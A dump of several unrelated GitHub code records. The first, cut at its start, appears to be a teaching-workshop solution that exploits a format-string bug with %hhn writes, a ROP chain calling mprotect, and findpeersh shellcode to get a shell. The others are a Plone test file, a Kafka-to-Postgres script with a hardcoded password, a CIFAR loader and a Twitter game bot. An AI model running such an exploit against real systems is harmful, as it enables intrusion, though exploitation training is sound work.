'%137$hhn')\n send_receive('A' * ((addr >> 8) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 2) + '%137$hhn')\n send_receive('A' * ((addr >> 16) & 0xff) + '%145$hhn')\n\n send_receive('A' * ((ebp2 & 0xff) + 3) + '%137$hhn')\n send_receive('A' * ((addr >> 24) & 0xff) + '%145$hhn')\n\ndef poke(addr, data):\n for i in range(len(data)):\n make_pointer(addr + i)\n send_receive('A' * data[i] + '%157$hhn')\n\ndef peek(addr):\n make_pointer(addr)\n r.sendline('%157$sTHE_END')\n return r.recvuntil('THE_END\\n')[:-8] + b'\\0'\n\nPAGE_SIZE = 0x1000\nPAGE_MASK = ~(PAGE_SIZE-1)\nshellcode = asm(shellcraft.findpeersh())\nshellcode_addr = ebp3 + 4\n\nadd_esp_76 = fmt_base + 0x00000d13 # add esp, 0x44 ; pop ebx ; pop ebp ; ret\npop2 = fmt_base + 0x00000928 # pop ebx ; pop ebp ; ret\nint_80 = fmt_base + 0x00000e88 # int 0x80 ; ret\npop_ebx = fmt_base + 0x00000739 # pop ebx ; ret\npop_eax = fmt_base + 0x00000d7b # pop eax ; ret\nles_ecx = fmt_base + 0x00000737 # les ecx, ptr [eax] ; pop ebx ; ret\nlea_edx = fmt_base + 0x00000a06 # lea edx, dword ptr [ebx - 0x110] ; mov dword ptr [esp], edx ; call eax\n\n\n# Value to put into ecx:es\npoke(fmt_base + 0x3000, p32(PAGE_SIZE) + b'\\0\\0')\n# Gadget to pivot the stack\npoke(ret_addr, p32(add_esp_76))\n# Shellcode\npoke(shellcode_addr, shellcode)\n\n# ROP chain\n# eax = SYS_mprotect\n# ebx = shellcode addr\n# ecx = len\n# edx = PROT_READ | PROT_WRITE | PROT_EXEC\npoke(ret_addr + 76 + 4, flat(\n #Put 7 into edx\n pop_ebx,\n (constants.PROT_READ | constants.PROT_WRITE | constants.PROT_EXEC) + 0x110,\n pop_eax,\n pop2,\n lea_edx,\n 0xdeadbeef,\n\n #Put 4096 into ecx AND address to mprotect into ebx\n pop_eax, # pop eax ; ret\n fmt_base + 0x3000, # ->eax\n les_ecx, # les ecx, ptr [eax] ; pop ebx ; ret\n shellcode_addr & PAGE_MASK, # address for mprotect must be on a page boundary\n\n pop_eax,\n int(constants.SYS_mprotect),\n int_80,\n shellcode_addr\n ))\n\nr.sendline('exit')\nr.interactive()\n","repo_name":"RobertLarsen/ProsaWorkshop","sub_path":"presentations/04-advanced-exploitation/assignments/solutions/opgave_9.py","file_name":"opgave_9.py","file_ext":"py","file_size_in_byte":3121,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"38"}
+{"seq_id":"20397671119","text":"# -*- coding: utf-8 -*-\n\"\"\"Tests for the IWWB Searcher utility.\"\"\"\n\nfrom iwwb.eventlist.tests.base import IntegrationTestCase\nfrom iwwb.eventlist.interfaces import IIWWBSearcher\nfrom zope.component import getUtility\n\nimport mock\nimport unittest2 as unittest\n\n\nclass TestIWWBSearcherMocked(unittest.TestCase):\n \"\"\"Unit test on IWWBSearcher using mocked service results.\"\"\"\n\n @mock.patch('iwwb.eventlist.searcher.Client')\n def test_catch_exception_on_invalid_client(self, suds_client):\n \"\"\"Test an exception is caugth if suds.client.Client() returns one when\n trying to access an invalid SOAP client.\n \"\"\"\n from iwwb.eventlist.searcher import IWWBSearcher\n\n suds_client.return_value = None\n suds_client.side_effect = Exception('Invalid SUDS client')\n\n with self.assertRaises(Exception):\n IWWBSearcher()._get_service_client()\n\n @mock.patch('iwwb.eventlist.searcher.IWWBSearcher._get_service_client')\n def test_return_empty_list_for_empty_results(self, _get_service_client):\n \"\"\"An empty list must be returned if we get empty SearchResults.\"\"\"\n from iwwb.eventlist.searcher import IWWBSearcher\n\n # IWWB service returns '' if it doesn't find any results\n _get_service_client.return_value.service.GetFullResult.return_value.SearchResults = ''\n\n self.assertEquals(IWWBSearcher().get_results(dict(query='foo')), [])\n\n\nclass TestIWWBSearcherIntegration(IntegrationTestCase):\n \"\"\"Integration test for the IWWBSearcher utility that actually call the\n service and assert results.\n \"\"\"\n\n def setUp(self):\n \"\"\"Custom shared utility setup for tests.\"\"\"\n self.portal = self.layer['portal']\n self.searcher = getUtility(IIWWBSearcher)\n self.searcher.results_per_page = 2\n\n def test_get_results_empty(self):\n # Search for events in a city that doesn't exist\n query = dict(city='FooBar')\n self.assertEquals(self.searcher.get_results(query), [])\n\n def test_get_results_not_empty(self):\n # This search should return some results\n query = dict(city='Berlin')\n self.assertGreater(len(self.searcher.get_results(query)), 0)\n\n def test_get_results_format(self):\n query = dict(city='Berlin')\n results = self.searcher.get_results(query)\n result = results[0]\n\n # See if we can access the attribute values for a result (we can't test\n # other attributes because they are not mandatory), this should not\n # throw an Attribute error.\n result.Rank\n result.Type\n\n def test_get_results_false_parameters(self):\n # Try searching with a nonexistent parameter, the method should fail\n query = dict(foo='bar')\n try:\n self.searcher.get_results(query)\n except:\n pass\n else:\n self.fail(\"get_results did not raise an Exception!\")\n\n\ndef test_suite():\n \"\"\"This sets up a test suite that actually runs the tests in the class\n above.\"\"\"\n return unittest.defaultTestLoader.loadTestsFromName(__name__)\n","repo_name":"collective/iwwb.eventlist","sub_path":"src/iwwb/eventlist/tests/test_searcher.py","file_name":"test_searcher.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"34222842632","text":"import socket\nfrom confluent_kafka import Consumer\nimport json\nimport pandas as pd\nfrom io import StringIO\nimport os\nimport sys\nimport psycopg2\nfrom psycopg2 import sql\n\nconf = {'bootstrap.servers':'172.18.0.3:9092',\n 'group.id':\"topic-to-staging\"}\n\nconsumer1 = Consumer(conf)\n\ndef consumer_func(consumer,topics,max_messages=17000):\n data = []\n message_count = 0\n try:\n consumer.subscribe(topics)\n\n while message_count < max_messages:\n msg = consumer.poll(timeout =1.0)\n if msg is None : continue\n if msg.error():\n print(\"hata var\")\n else:\n json_data = msg.value().decode('utf-8')\n\n python_dict = json.loads(json_data)\n\n data.append(python_dict)\n\n message_count += 1\n except Exception as e:\n # Hata oluştuğunda ne yapılacağını belirleyebilirsiniz.\n print(f'Hata oluştu: {e}')\n return None \n finally:\n dataframe = pd.DataFrame(data)\n consumer.close()\n return dataframe\n\n\ncr_table_sql_script = (f\"CREATE TABLE IF NOT EXISTS staging.example\" +\n \"(Country varchar(200) NULL , Month varchar(50) NULL , Year int NULL, Visitor float NULL);\")\n\n\ndef write_dataframe_to_postgres(dataframe, schema_name='staging', table_name='example'):\n\n try:\n # Veritabanına bağlan\n connection = psycopg2.connect(\n host=\"localhost\",\n user=\"postgres\",\n password=\"1234\",\n database=\"postgres\"\n )\n\n # DataFrame'i CSV formatına dönüştür\n csv_data = dataframe.to_csv(index=False, header=False)\n\n # CSV formatındaki veriyi bir bellek tamponuna yaz\n csv_buffer = StringIO()\n csv_buffer.write(csv_data)\n csv_buffer.seek(0)\n\n # Cursor oluştur\n cursor = connection.cursor()\n cursor.execute(cr_table_sql_script)\n\n # CSV verisini PostgreSQL tablosuna kopyala\n copy_query = sql.SQL(\"COPY {}.{} FROM STDIN WITH CSV\").format(\n sql.Identifier(schema_name),\n sql.Identifier(table_name)\n )\n cursor.copy_expert(sql=copy_query, file=csv_buffer)\n connection.commit()\n print(\"DataFrame başarılı bir şekilde veritabanına aktarıldı.\")\n\n except psycopg2.Error as e:\n print(f\"PSQL Hatası: {e}\")\n\n finally:\n # Bağlantıyı kapat\n if 'connection' in locals():\n connection.close()\n\ndef main():\n try :\n dataframe = consumer_func(consumer=consumer1,topics=[\"staging\"],max_messages=17000)\n if dataframe is not None:\n # BURADA DATAFRAME ÜZERİNDE İŞLEMELER GERÇEKLEŞEBİLİR.\n print(dataframe.head())\n write_dataframe_to_postgres(dataframe)\n else:\n print(\"Topicten Veri alınırken bir hata oluştu\")\n except Exception as e:\n print(f\"Bir Hata Alınıdnı {e}\")\n finally:\n # Consumerı Kapatma İşlemi\n if consumer1 is not None:\n consumer1.close()\n\nif __name__ == '__main__':\n main()","repo_name":"afaruksargin/DataPipelineWithDockerAirflowKafka","sub_path":"py_script/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":3123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"37648568391","text":"# search_data.py\n# Construct and preprocess data for model\n\nimport torch\nimport torchvision\nfrom torchvision import transforms, datasets\nfrom utils import *\nimport os\nimport random\n\n'''\n Retrieve images from CIFAR-10 dataset using torchvision\n'''\ndef get_cifar_data():\n transform = transforms.Compose([\n transforms.Resize((224,224)),\n transforms.ToTensor(),\n transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010))\n ])\n\n trainset = torchvision.datasets.CIFAR10(root='../data', train=True, download=True, transform=transform)\n \n # Construct DataLoaders for training and test sets\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=1, shuffle=False, num_workers=1)\n testset = torchvision.datasets.CIFAR10(root='../data', train=False, download=True, transform=transform)\n testloader = torch.utils.data.DataLoader(testset, batch_size=1, shuffle=False, num_workers=1)\n\n return trainloader, testloader, trainset\n\ndef index_dataset(trainset):\n feature_indexer = Indexer()\n add_dataset_features(trainset, feature_indexer)\n print(len(feature_indexer))\n\n'''\n Parse and retrieve data from train_path. Also construct an image indexer from index to image_path\n'''\ndef get_ml_data(train_path, train_cutoff=.95):\n indexer = Indexer()\n files = [os.path.join(train_path, p) for p in sorted(os.listdir(train_path))]\n for file in files:\n indexer.get_index(file)\n\n # Generate training and test set - 95% traning, 5% test\n a = [i for i in range(len(files))]\n random.shuffle(a)\n cutoff = int(len(files)*train_cutoff)\n train_data = a[:cutoff]\n test_data = a[cutoff:]\n return train_data, test_data, indexer","repo_name":"SanatSharma/RevSearch","sub_path":"search_data.py","file_name":"search_data.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"}
+{"seq_id":"207776495","text":"import tweepy\r\nimport emojis\r\nimport random, io, time\r\n\r\nQTDEVENTOS = 3\r\nMAX_LINHAS = 5\r\n\r\narq = open(\"edicao.txt\", \"r\")\r\nfor linha in arq:\r\n edicao = linha\r\narq.close()\r\ntodosEmotes = []\r\nfrasesTXT = open(\"frases.txt\", \"r\")\r\nfrases = []\r\nfor linha in frasesTXT:\r\n frases.append(linha.strip())\r\nfrasesTXT.close()\r\ndesenhosTXT = io.open(\"desenhos.txt\", \"r\")\r\ndesenhos = []\r\nfor linha in desenhosTXT:\r\n desenhos.append(linha.strip())\r\nchavesTXT = open(\"chaves.txt\", \"r\")\r\nchaves = []\r\nfor linha in chavesTXT:\r\n chaves.append(linha.strip())\r\nprint(f'''\r\nConsumer key: {chaves[0]}\r\nConsumer secret: {chaves[1]}\r\nAccess key: {chaves[2]}\r\nAccess secret: {chaves[3]}\r\n\r\nChaves retiradas de 'chaves.txt'\r\nPara acessar as chaves vá em https://developer.twitter.com/en/apps\r\n''')\r\n\r\nconsumer_key = chaves[0]\r\nconsumer_secret = chaves[1]\r\naccess_key = chaves[2]\r\naccess_secret = chaves[3]\r\n\r\nauth = tweepy.OAuthHandler(consumer_key, consumer_secret)\r\nauth.set_access_token(access_key, access_secret)\r\napi = tweepy.API(auth)\r\n\r\ndef esperar(tempo):\r\n print(f\"\\tAguardando {tempo} segundos\")\r\n time.sleep(tempo)\r\n\r\ndef tweetarXmin(texto, tempo):\r\n print(f\"\\tTweetando: \\n{texto}\")\r\n api.update_status(status = texto)\r\n esperar(tempo)\r\n\r\ndef tweetarXminReply(texto, tempo, tweet):\r\n print(f\"Respondendo o útlimo tweet:\\n{texto}\")\r\n api.update_status(status=texto, in_reply_to_status_id=tweet.id)\r\n esperar(tempo)\r\n\r\ndef removeDaListaVivos(lista1, lista2, morre):\r\n for linha in lista1:\r\n if (morre in linha):\r\n linha.remove(morre)\r\n lista2.remove(morre)\r\n return lista1, lista2\r\n\r\ndef anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api):\r\n metade = False\r\n contador = 0\r\n statusText = ''\r\n if (len(mortesDoDia) > 0):\r\n if (len(mortesDoDia) == 1):\r\n i = 1\r\n for linha in participantesOriginais:\r\n if (mortesDoDia[0] in linha):\r\n statusText = f\"hoje fora ouvido apenas um tiro de canhão: \\n@{mortesDoDia[0]} do distrito {i}\\nserá isso bom ou ruim?\"\r\n break\r\n i += 1\r\n else:\r\n statusText = f'Hoje foram ouvidos {len(mortesDoDia)} tiros de canhão a distância:'\r\n for morto in mortesDoDia:\r\n statusText += f\"\\n@{morto} \"\r\n i = 1\r\n for linha in participantesOriginais:\r\n if (morto in linha):\r\n statusText += f\"do distrito {i}\"\r\n break\r\n i += 1\r\n contador += 1\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n metade = True\r\n tweetarXmin(statusText, 10)\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 30 * contador, tweet)\r\n statusText = \"\"\r\n if (not contador % MAX_LINHAS == 0):\r\n if (metade):\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n if (len(participantesVivosLista) > 1):\r\n tweetarXminReply(statusText, min(30 * contador, 300), tweet)\r\n else:\r\n tweetarXminReply(statusText, min(30), tweet)\r\n statusText = \"\"\r\n else:\r\n if (len(participantesVivosLista) > 1):\r\n tweetarXmin(statusText, min(30 * contador, 300))\r\n else:\r\n tweetarXmin(statusText, 30)\r\n statusText = \"\"\r\n\r\ndef hungerGamesEvent():\r\n\r\n #region Post de inscrição dos tributos (+600 segs)\r\n statusText = f'''\r\nQUE COMECEM OS JOGOS VORAZES {edicao} \r\nPara participar comente algo nesse status, deixe seu grito de guerra, seu texto motivacional, qlqr coisa.\r\nVocê será notificado da sua participação\r\n\r\nRT/Fav pra fortalecer o bot <3\r\nAs inscrições terminam em 30 minutos\r\n#JogosVorazes\r\n'''\r\n arq = open(\"edicao.txt\", \"w\")\r\n arq.write(str(int(edicao) + 1))\r\n arq.close()\r\n tweetarXmin(statusText, 1800)\r\n # endregion\r\n\r\n print(\"Pegando nomes do último status\")\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n replies = tweepy.Cursor(api.search, q=f'to:@{api.me().screen_name}',result_type=\"recent\", since_id=tweet.id, tweet_mode='extended').items()\r\n #replies = tweepy.Cursor(api.search, q=f'to:@{api.me().screen_name}', since_id=tweet.id, tweet_mode='extended').items()\r\n participantesVivos = [[]]\r\n participantesOriginais = [[]]\r\n participantesVivosLista = []\r\n cont = 0\r\n i = 0\r\n '''\r\n while cont < 24:\r\n\r\n #region Juntando os participantes das respostas do ultimo tweet nos vetores de participantes\r\n try:\r\n for reply in replies:\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if(participante == reply.user.screen_name):\r\n adicionado = True\r\n break\r\n if (not adicionado):\r\n participantesVivosLista.append(reply.user.screen_name)\r\n reply = replies.next()\r\n # print(reply.user.screen_name)\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if(participante == reply.user.screen_name):\r\n adicionado = True\r\n break\r\n if(adicionado):\r\n continue\r\n participantesVivosLista.append(reply.user.screen_name)\r\n \r\n #cont += 1\r\n except:\r\n print(\"Não há mais replies\")\r\n break\r\n #endregion\r\n '''\r\n for reply in replies:\r\n adicionado = False\r\n print(reply)\r\n for participante in participantesVivosLista:\r\n if (participante == reply.user.screen_name):\r\n print(\"Participante já adicionado\")\r\n adicionado = True\r\n break\r\n if (not adicionado):\r\n participantesVivosLista.append(reply.user.screen_name)\r\n\r\n print(f\"Participantes: {participantesVivosLista}\")\r\n\r\n #region Juntando 24 pessoas aleatórias das que responderam o último tweet (pra não ser os primeiros)\r\n cont = 0\r\n i = 0\r\n if (len(participantesVivosLista) >= 24):\r\n participantesVivosLista = random.sample(participantesVivosLista, 24)\r\n for pessoa in participantesVivosLista:\r\n if (cont % 2 == 0):\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n else:\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n if (cont == 24):\r\n break\r\n else:\r\n for pessoa in participantesVivosLista:\r\n if (cont % 2 == 0):\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n else:\r\n participantesVivos[i].append(pessoa)\r\n participantesOriginais[i].append(pessoa)\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n # endregion\r\n\r\n #region Adicionado listas predefinidas para testes\r\n #participantesVivos = [['Gabriel3wefsd','Werneckasfq'],['Yasminhtyhd','Mayaraffrewg'],['Lucianosdgvrth','Tutdasgwefgs'],['Gustavobtgym','Amandaikghd'],['Pedroryjfs','Maryyxjvfb'],['Douglasxhjxdh','Caiolmxzsdk'],['AGabriel3wefsd','AWerneckasfq'],['AYasminhtyhd','AMayaraffrewg'],['ALucianosdgvrth','ATutdasgwefgs'],['AGustavobtgym','AAmandaikghd'],['APedroryjfs','AMaryyxjvfb'],['ADouglasxhjxdh','ACaiolmxzsdk'],[]]\r\n #participantesOriginais = [['Gabriel3wefsd','Werneckasfq'],['Yasminhtyhd','Mayaraffrewg'],['Lucianosdgvrth','Tutdasgwefgs'],['Gustavobtgym','Amandaikghd'],['Pedroryjfs','Maryyxjvfb'],['Douglasxhjxdh','Caiolmxzsdk'],['AGabriel3wefsd','AWerneckasfq'],['AYasminhtyhd','AMayaraffrewg'],['ALucianosdgvrth','ATutdasgwefgs'],['AGustavobtgym','AAmandaikghd'],['APedroryjfs','AMaryyxjvfb'],['ADouglasxhjxdh','ACaiolmxzsdk'],[]]\r\n #participantesVivosLista = ['Gabriel3wefsd','Werneckasfq','Yasminhtyhd','Mayaraffrewg','Lucianosdgvrth','Tutdasgwefgs','Gustavobtgym','Amandaikghd','Pedroryjfs','Maryyxjvfb','Douglasxhjxdh','Caiolmxzsdk','AGabriel3wefsd','AWerneckasfq','AYasminhtyhd','AMayaraffrewg','ALucianosdgvrth','ATutdasgwefgs','AGustavobtgym','AAmandaikghd','APedroryjfs','AMaryyxjvfb','ADouglasxhjxdh','ACaiolmxzsdk']\r\n #cont = 24\r\n #endregion\r\n\r\n\r\n #region Não há pessoas suficientes pra prosseguir o evento, completando com bots!\r\n if (cont < 24):\r\n file = open(\"bots.txt\", \"r\")\r\n bots = file.readlines()\r\n file.close()\r\n qtdBots = 24 - cont\r\n listaBots = random.sample(bots, qtdBots)\r\n while cont < 24:\r\n bot = listaBots.pop()\r\n num = str(random.randint(100,999))\r\n participantesVivos[i].append(\"Bot\"+bot.strip()+str(num))\r\n participantesOriginais[i].append(\"Bot\"+bot.strip()+str(num))\r\n participantesVivosLista.append(\"Bot\"+bot.strip()+str(num))\r\n if (cont % 2 == 1):\r\n participantesVivos.append([])\r\n participantesOriginais.append([])\r\n i += 1\r\n cont += 1\r\n print(participantesOriginais)\r\n #endregion\r\n\r\n #region Carregando as frases de 'frases HG.txt' em seus respectivos vetores e misturando os vetores\r\n frasesHGTXT = open(\"frases HG.txt\",\"r\")\r\n momento = \"\"\r\n mataMata, causasNaturais, items, noite, noiteEmDupla = [], [], [], [], []\r\n for linha in frasesHGTXT:\r\n if(linha.strip().isupper()):\r\n momento = linha.strip()\r\n continue\r\n if(momento == \"MATA MATA\"):\r\n mataMata.append(linha.strip())\r\n continue\r\n elif(momento == \"CAUSAS NATURAIS\"):\r\n causasNaturais.append(linha.strip())\r\n continue\r\n elif(momento == \"ITEMS\"):\r\n items.append(linha.strip())\r\n continue\r\n elif(momento == \"NOITE\"):\r\n noite.append(linha.strip())\r\n continue\r\n elif(momento == \"NOITE EM DUPLA\"):\r\n noiteEmDupla.append(linha.strip())\r\n continue\r\n\r\n frasesHGTXT.close()\r\n cMM, cCN, cI, cN, cNED = 0, 0, 0, 0, 0\r\n mataMata = random.sample(mataMata,len(mataMata))\r\n causasNaturais = random.sample(causasNaturais, len(causasNaturais))\r\n items = random.sample(items, len(items))\r\n noite = random.sample(noite, len(noite))\r\n noiteEmDupla = random.sample(noiteEmDupla, len(noiteEmDupla))\r\n #endregion\r\n\r\n #region Carregando vetores com dizeres quando não acontece o evento\r\n eventoSemTiro = ['Sem tiros de canhão hoje\\n\\nsó isso mesmo','Não houveram mortes hoje','Ninguém morreu hoje\\nimpressionante, mas o jogo tem que continuar :)','Não houveram tiros de canhão hoje\\nserá que hoje os tributos dormem mais tranquilos?', 'Nenhum tiro de canhão foi dado hoje']\r\n eventoSemTiro = random.sample(eventoSemTiro, len(eventoSemTiro))\r\n cEST = 0\r\n\r\n eventoCombatesDiretos = ['Os tributos não se encontraram no soco hoje\\nsorte? acho que não\\ncoincidência? talvez\\nhotel? trivago','Ninguém encontrou ninguém\\nNinguém matou ninguém\\nsem combates diretos hoje','Não houveram mano a mano hoje\\nmas aposto que amanhã vai ter ;)','Vem pro x1! não?\\nta, hoje não teve x1']\r\n eventoCombatesDiretos = random.sample(eventoCombatesDiretos, len(eventoCombatesDiretos))\r\n cECD = 0\r\n # endregion\r\n\r\n #region Apresentação dos tributos, pegar os tributos do vetor dos participantes que entraram no evento (+300 segs)\r\n statusText = '''Conheçam os tributos:'''\r\n i = 0\r\n participantesVivos.pop()\r\n metade = False\r\n for linha in participantesVivos:\r\n statusText += f\"\\nD{i + 1}:\"\r\n for pessoa in linha:\r\n statusText += \" @\"+pessoa+\" e\"\r\n statusText = statusText[:-2]+\"\"\r\n i += 1\r\n if (i % (len(participantesVivos)/2) == 0 and not metade):\r\n tweetarXmin(statusText, 30)\r\n statusText = \"\"\r\n metade = True\r\n statusText += \"\\nCom isso fecham os tributos selecionados\"\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText,300,tweet)\r\n # endregion\r\n\r\n acabou = False\r\n dia = 1\r\n primeiroMomento = True\r\n while not acabou:\r\n aindaNaoMataram = participantesVivosLista.copy()\r\n mortesDoDia = []\r\n\r\n #region Primeiro momento, evento de abertura da cornucópia\r\n if (primeiroMomento):\r\n primeiroMomento = False\r\n addSorte = 0\r\n sorte = 0\r\n statusText = \"\"\r\n dado = random.randint(1,100)\r\n if (dado % 42 == 0):\r\n morre = participantesVivosLista[random.randint(0,len(participantesVivosLista) - 1)]\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n mortesDoDia.append(morre)\r\n statusText += f\"\\na plataforma de @{morre} explode pq começou se afobou\"\r\n statusText += f\"\\ncomeça a corrida, alguns se escondem, outros tentam a sorte na cornucopia, sangue rola logo no inÃcio\"\r\n while sorte <= 45:\r\n if (len(aindaNaoMataram) < 2):\r\n break\r\n mata, morre = random.sample(aindaNaoMataram, 2)\r\n aindaNaoMataram.remove(mata)\r\n aindaNaoMataram.remove(morre)\r\n\r\n\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n statusText += f\"\\n@{mata} matou @{morre} {mataMata[cMM]}\"\r\n cMM += 1\r\n mortesDoDia.append(morre)\r\n\r\n addSorte += random.randint(10,15)\r\n sorte = random.randint(0, 100) + addSorte\r\n if (len(participantesVivosLista) == 1):\r\n acabou = True\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n break\r\n\r\n\r\n tweetarXmin(statusText, 150)\r\n # endregion\r\n\r\n if (acabou):\r\n break\r\n\r\n #region evento de x1 onde pessoa X mata pessoa Y (+30~300 segs)\r\n addSorte = 0\r\n sorte = random.randint(0,200)\r\n contador = 1\r\n metade = False\r\n statusText = f\"Dia {dia}:\"\r\n if (sorte > 180):\r\n statusText += \"\\n\" + eventoCombatesDiretos[cECD]\r\n cECD += 1\r\n while sorte <= 180:\r\n if (len(aindaNaoMataram) < 2):\r\n break\r\n mata, morre = random.sample(aindaNaoMataram, 2)\r\n aindaNaoMataram.remove(mata)\r\n aindaNaoMataram.remove(morre)\r\n\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos,\r\n participantesVivosLista, morre)\r\n statusText += f\"\\n@{mata} matou @{morre} {mataMata[cMM]}\"\r\n cMM += 1\r\n mortesDoDia.append(morre)\r\n contador += 1\r\n\r\n\r\n addSorte += random.randint(30, 35)\r\n sorte = random.randint(0, 100) + addSorte\r\n if (len(participantesVivosLista) == 1):\r\n acabou = True\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n break\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n if(not contador % MAX_LINHAS == 0):\r\n if(metade):\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, min(300, 15*contador), tweet)\r\n else:\r\n tweetarXmin(statusText, min(15*contador, 300))\r\n statusText = ''\r\n else:\r\n esperar(min(300, 15*contador))\r\n #endregion\r\n\r\n #region Evento morrer sozinho (+15~300 segs)\r\n addSorte = 0\r\n sorte = random.randint(0,100)\r\n contador = 1\r\n metade = False\r\n statusText = f\"Dia {dia}:\"\r\n\r\n if (sorte > 80):\r\n statusText = \"\"\r\n while sorte <= 75:\r\n addSorte += random.randint(15, 20)\r\n sorte = random.randint(0,100) + addSorte\r\n morre = random.sample(participantesVivosLista, 1)[0]\r\n participantesVivos, participantesVivosLista = removeDaListaVivos(participantesVivos, participantesVivosLista, morre)\r\n mortesDoDia.append(morre)\r\n contador += 1\r\n\r\n statusText += f\"\\n@{morre} {causasNaturais[cCN]}\"\r\n cCN += 1\r\n if(len(participantesVivosLista) == 1):\r\n acabou = True\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n break\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n if(statusText):\r\n if(not metade):\r\n tweetarXmin(statusText, 15*contador)\r\n else:\r\n esperar(15*contador)\r\n #endregion\r\n\r\n #region Patrocinador ajudando (150 segs)\r\n addSorte = 0\r\n sorte = random.randint(0,100)\r\n statusText = f\"Dia {dia}:\"\r\n if (sorte <= 10):\r\n sortudo = random.sample(participantesVivosLista, 1)[0]\r\n statusText += f\"\\nolha que sorte\\nparece que os patrocinadores estão de olho em @{sortudo} e lhe deram {items[cI]}\\nesperamos que saiba como utilizar\"\r\n cI += 1\r\n tweetarXmin(statusText, 150)\r\n #endregion\r\n\r\n #region Anunciar mortos do dia se não tiver terminado o evento\r\n if(len(mortesDoDia) == 0):\r\n statusText = eventoSemTiro[cEST]\r\n cEST += 1\r\n tweetarXmin(statusText, 180)\r\n else:\r\n anunciarMortos(mortesDoDia, participantesOriginais, participantesVivosLista, api)\r\n if (len(participantesVivosLista) == 1):\r\n acabou = True\r\n break\r\n #endregion\r\n\r\n #region Evento para os 2 útilmos participantes\r\n if (len(participantesVivosLista) == 2):\r\n statusText = \"\"\r\n dado = random.randint(1, 200)\r\n if (dado == 99):\r\n statusText = f'''\r\n@{participantesVivosLista[0]} já não é a mesma pessoa de quando começou.\r\n@{participantesVivosLista[1]} também não está nada bem\r\nambos se encontram na cornucopia\r\nlágrimas escorrem\r\nambos se encaram\r\no destino é certo\r\n...\r\nambos decidem se matar em protesto ao banho de sangue\r\n'''\r\n tweetarXmin(statusText, 0)\r\n return None\r\n mata, morre = random.sample(participantesVivosLista, 2)\r\n\r\n statusText += f\"Os ultimos sobreviventes se encontram\\nUtilizam de todo seu potencial e\\n@{mata} mata @{morre}\\ntornando-se a última pessoa de pé em uma arena ensanguentada\\nParabéns merecidamente!\\nSigam a página, RT+Fav :]\"\r\n\r\n tweetarXmin(statusText, 0)\r\n return None\r\n #endregion\r\n\r\n #region Evento da noite (30~300 segs)\r\n\r\n addSorte = 0\r\n sorte = random.randint(0, 100)\r\n statusText = f\"Noite {dia}:\"\r\n listaNoite = random.sample(participantesVivosLista, len(participantesVivosLista))\r\n contador = 1\r\n\r\n metade = False\r\n while sorte <= 100:\r\n addSorte += random.randint(15, 30)\r\n sorte = random.randint(0, 60)\r\n dado = random.randint(0, 4)\r\n if (dado):\r\n pessoa = listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} {noite[cN]}\"\r\n cN += 1\r\n elif (len(listaNoite) >= 2 and len(participantesVivosLista) >= 4):\r\n pessoa, dupla = listaNoite.pop(), listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} e @{dupla} {noiteEmDupla[cNED]}\"\r\n cNED += 1\r\n else:\r\n pessoa = listaNoite.pop()\r\n statusText += f\"\\n@{pessoa} achou {items[cI]}\"\r\n cI += 1\r\n if (not listaNoite):\r\n break\r\n contador += 1\r\n if (contador % MAX_LINHAS == 0):\r\n if (not metade):\r\n tweetarXmin(statusText, 10)\r\n statusText = ''\r\n metade = True\r\n else:\r\n tweet = api.user_timeline(screen_name=api.me().screen_name, count=1, tweet_mode='extended')[0]\r\n tweetarXminReply(statusText, 10, tweet)\r\n statusText = ''\r\n if (not metade):\r\n 